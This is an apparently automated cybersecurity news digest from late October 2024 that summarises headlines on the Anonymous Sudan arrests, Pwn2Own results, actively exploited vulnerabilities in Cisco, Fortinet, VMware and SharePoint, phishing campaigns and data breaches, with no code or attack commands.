Essential Cyber Intel Brief: 10/27/2024
In today’s connected world, cyber threats are escalating rapidly, making it critical to stay informed. On October 26, 2024, I launched a Python-powered tracking program to quickly compile the most important cybersecurity events and breaches from trusted sources like Krebs on Security, The Hacker News, Security Week, and others.
No one has time to sift through dozens of websites for critical insights. That’s why I developed a better solution—automated, curated, and absolutely free. Stay ahead with concise updates pulled from trusted sources, without the hassle.
Designed for efficiency, my new program pinpoints the most critical cybersecurity events security professionals and business leaders need to know today. In just one to two minutes, you’ll determine if the latest developments require further attention, allowing you to stay informed and focused without disruption.
Breach-related content is highlighted in yellow for easy scanning. I also have a?dedicated 2024 cybersecurity breach news page that you can quickly review.
Subscribe to my website to receive automated notifications and stay ahead of key developments—no spam, just concise, relevant updates delivered directly to your inbox.
You can connect with me on LinkedIn and join my professional network.
PS-
Most of the updates won't involve this much information. I am tuning the system to establish the baseline, and these updates today are a means to get caught up. I didn't want to leave out important information, so I included it for your review.
10/27/2024 – New Cybersecurity Updates
ID: 24
Summary: Sudanese Brothers Arrested in ‘AnonSudan’ Takedown – The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers. One of the brothers is facing life in prison for allegedly seeking to kill people with his attacks.
Date: 2024-10-17
ID: 25
Summary: This Windows PowerShell Phish Has Scary Potential – Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While it’s unlikely that many programmers fell for this scam, it’s notable because less targeted versions of it are likely to be far more successful against the average Windows user.
Date: 2024-09-19
ID: 26
Summary: Over 70 zero-day flaws get hackers $1 million at Pwn2Own Ireland – The fourth day of Pwn2Own Ireland 2024 marked the end of the hacking competition with more than $1 million in prizes for over 70 unique zero-day vulnerabilities in fully patched devices. […]
Date: 2024-10-26
ID: 27
Summary: QNAP, Synology, Lexmark devices hacked on Pwn2Own Day 3 – The third day of Pwn2Own Ireland 2024 continued to showcase the expertise of white hat hackers as they exposed 11 zero-day vulnerabilities, adding $124,750 to the total prize pool, which now stands at $874,875. […]
Date: 2024-10-25
ID: 28
Summary: CERT-UA Identifies Malicious RDP Files in Latest Attack on Ukrainian Entities – The Computer Emergency Response Team of Ukraine (CERT-UA) has detailed a new malicious email campaign targeting government agencies, enterprises, and military entities.
“The messages exploit the appeal of integrating popular services like Amazon or Microsoft and implementing a zero-trust architecture,” CERT-UA said. “These emails contain attachments in the form of Remote Desktop Protocol (‘.rdp’
Date: 2024-10-26
ID: 29
Summary: Researchers Discover Command Injection Flaw in Wi-Fi Alliance’s Test Suite – A security flaw impacting the Wi-Fi Test Suite could enable unauthenticated local attackers to execute arbitrary code with elevated privileges.
The CERT Coordination Center (CERT/CC) said the vulnerability, tracked as CVE-2024-41992, said the susceptible code from the Wi-Fi Alliance has been found deployed on Arcadyan FMIMG51AX000J routers.
Date: 2024-10-25
ID: 30
Summary: AWS Cloud Development Kit Vulnerability Exposes Users to Potential Account Takeover Risks – Cybersecurity researchers have disclosed a security flaw impacting Amazon Web Services (AWS) Cloud Development Kit (CDK) that could have resulted in an account takeover under specific circumstances.
Date: 2024-10-24
ID: 31
Summary: Cisco Issues Urgent Fix for ASA and FTD Software Vulnerability Under Active Attack – Cisco on Wednesday said it has released updates to address an actively exploited security flaw in its Adaptive Security Appliance (ASA) that could lead to a denial-of-service (DoS) condition.
The vulnerability, tracked as CVE-2024-20481 (CVSS score: 5.8), affects the Remote Access VPN (RAVPN) service of Cisco ASA and Cisco Firepower Threat Defense (FTD) Software.
Date: 2024-10-24
ID: 32
Summary: Why Phishing-Resistant MFA Is No Longer Optional: The Hidden Risks of Legacy MFA – Sometimes, it turns out that the answers we struggled so hard to find were sitting right in front of us for so long that we somehow overlooked them.?
When the Department of Homeland Security, through the Cybersecurity and Infrastructure Security Agency (CISA), in coordination with the FBI, issues a cybersecurity warning and prescribes specific action, it’s a pretty good idea to at least read the
Date: 2024-10-24
ID: 33
Summary: Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices – The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices.
Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor.
Date: 2024-10-24
ID: 34
Summary: Fortinet Warns of Critical Vulnerability in FortiManager Under Active Exploitation – Fortinet has confirmed details of a critical security flaw impacting FortiManager that has come under active exploitation in the wild.
Tracked as CVE-2024-47575 (CVSS score: 9.8), the vulnerability is also known as FortiJump and is rooted in the FortiGate to FortiManager (FGFM) protocol.
Date: 2024-10-24
ID: 35
Summary: New Grandoreiro Banking Malware Variants Emerge with Advanced Tactics to Evade Detection – New variants of a banking malware called Grandoreiro have been found to adopt new tactics in an effort to bypass anti-fraud measures, indicating that the malicious software is continuing to be actively developed despite law enforcement efforts to crack down on the operation.
Date: 2024-10-23
ID: 36
Summary: CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094) – A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active exploitation.
Date: 2024-10-23
领英推荐
ID: 37
Summary: Gophish Framework Used in Phishing Campaigns to Deploy Remote Access Trojans – Russian-speaking users have become the target of a new phishing campaign that leverages an open-source phishing toolkit called Gophish to deliver DarkCrystal RAT (aka DCRat) and a previously undocumented remote access trojan dubbed PowerRAT.
Date: 2024-10-22
ID: 38
Summary: Security Flaw in Styra’s OPA Exposes NTLM Hashes to Remote Attackers – Details have emerged about a now-patched security flaw in Styra’s Open Policy Agent (OPA) that, if successfully exploited, could have led to leakage of New Technology LAN Manager (NTLM) hashes.
Date: 2024-10-22
ID: 39
Summary: VMware Releases vCenter Server Update to Fix Critical RCE Vulnerability – VMware has released software updates to address an already patched security flaw in vCenter Server that could pave the way for remote code execution.
The vulnerability, tracked as CVE-2024-38812 (CVSS score: 9.8), concerns a case of heap-overflow vulnerability in the implementation of the DCE/RPC protocol.
Date: 2024-10-22
ID: 40
Summary: CISA Adds ScienceLogic SL1 Vulnerability to Exploited Catalog After Active Zero-Day Attack – The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a critical security flaw impacting ScienceLogic SL1 to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation as a zero-day.
The vulnerability in question, tracked as CVE-2024-9537 (CVSS v4 score: 9.3), refers to a bug involving an unspecified third-party component.
Date: 2024-10-22
ID: 41
Summary: Hackers are using new tricks to break into systems we thought were secure—like finding hidden doors in locked houses. But the good news? Security experts are fighting back with smarter tools to keep data safe.
Date: 2024-10-21
ID: 42
Summary: Researchers Discover Severe Security Flaws in Major E2EE Cloud Storage Providers – Cybersecurity researchers have discovered severe cryptographic issues in various end-to-end encrypted (E2EE) cloud storage platforms that could be exploited to leak sensitive data.
Date: 2024-10-21
ID: 43
Summary: Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials – Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials.
Date: 2024-10-20
ID: 44
Summary: Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign – Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems.
“This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems,”
Date: 2024-10-18
ID: 45
Summary: Microsoft Reveals macOS Vulnerability that Bypasses Privacy Controls in Safari Browser – Microsoft has disclosed details about a now-patched security flaw in Apple’s Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user’s privacy preferences and access data.
The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133 (CVSS score: 5.5). It was addressed by Apple as part of macOS Sequoia 15.
Date: 2024-10-18
ID: 46
Summary: U.S. Charges Two Sudanese Brothers for Record 35,000 DDoS Attacks – Federal prosecutors in the U.S. have charged two Sudanese brothers with running a distributed denial-of-service (DDoS) botnet for hire that conducted a record 35,000 DDoS attacks in a single year, including those that targeted Microsoft’s services in June 2023.
Date: 2024-10-17
ID: 47
Summary: Critical Kubernetes Image Builder Vulnerability Exposes Nodes to Root Access Risk – A critical security flaw has been disclosed in the Kubernetes Image Builder that, if successfully exploited, could be abused to gain root access under certain circumstances.
The vulnerability, tracked as CVE-2024-9486 (CVSS score: 9.8), has been addressed in version 0.1.38. The project maintainers acknowledged Nicolai Rybnikar for discovering and reporting the vulnerability.
Date: 2024-10-17
ID: 53
Summary: Landmark Admin Discloses Data Breach Impacting 800,000 People – Insurance administrator Landmark Admin says personal information stolen in a ransomware attack earlier this year.
Date: 2024-10-25
ID: 54
Summary: Change Healthcare Ransomware Attack Impacts 100 Million People – UnitedHealth told the US health department that hackers stole the information of 100 million people in a February ransomware attack.
Date: 2024-10-25
ID: 55
Summary: AWS Seizes Domains Used by Russia’s APT29 – AWS announced the seizure of domains used by Russian hacker group APT29 in phishing attacks targeting Ukraine and other countries.
Date: 2024-10-25
ID: 56
Summary: OnePoint Patient Care Data Breach Impacts Nearly 800,000 People – OnePoint Patient Care has disclosed a data breach impacting the personal information of nearly 800,000 individuals.
Date: 2024-10-25
You can connect with me on LinkedIn and join my professional network.